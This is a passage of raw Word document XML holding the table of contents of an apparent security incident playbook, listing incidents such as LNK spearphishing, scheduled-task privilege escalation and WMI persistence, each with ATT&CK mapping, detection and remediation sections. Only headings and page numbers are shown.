            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Playbook TTP Overview</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896677 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0522533A" w14:textId="6AE8498A" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896678" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detailed List of Cybersecurity Incidents &amp; TTPs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896678 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10DF907F" w14:textId="565176F6" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896679" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #001 – Spearphishing Attachment (LNK)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896679 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BB702FE" w14:textId="5247D994"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80" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896680 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66FAC694" w14:textId="38CA9DDB"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81" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896681 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DA102CB" w14:textId="13BCEB97"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82" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896682 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64F4F638" w14:textId="03BECF9B"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83" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896683 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24969F55" w14:textId="0D4E8D97"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84" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control/Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896684 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="416B4351" w14:textId="5B886C64"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85" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896685 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B02402F" w14:textId="424530D7" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896686" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #002 – Privileged Escalation via Insecure Scheduled Task Permissions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896686 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30652909" w14:textId="19E41B0D"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87" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896687 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33E40F91" w14:textId="7F96DA3A"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88" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896688 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F360A96" w14:textId="5C348B17"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89" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detection / IOCs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896689 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6740FF52" w14:textId="419ADE27"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90" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Strategies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896690 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="438FDD08" w14:textId="3282ADBC"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91" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Security Control/Mitigation Recommendations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896691 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="011F597F" w14:textId="43FF6118"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92" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>References</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896692 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AB90B98" w14:textId="304FB9CB" w:rsidR="000603BD" w:rsidRDefault="000603BD">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9182"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc220896693" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Incident #003 – Permanent WMI Event Subscription Persistence (Timer-based)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896693 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17FE9160" w14:textId="339D8853"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94" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Mapping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896694 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C1BD5F9" w14:textId="005BAE6F"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95" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Attack Documentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc220896695 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72EC753A" w14:textId="16596660"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96" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
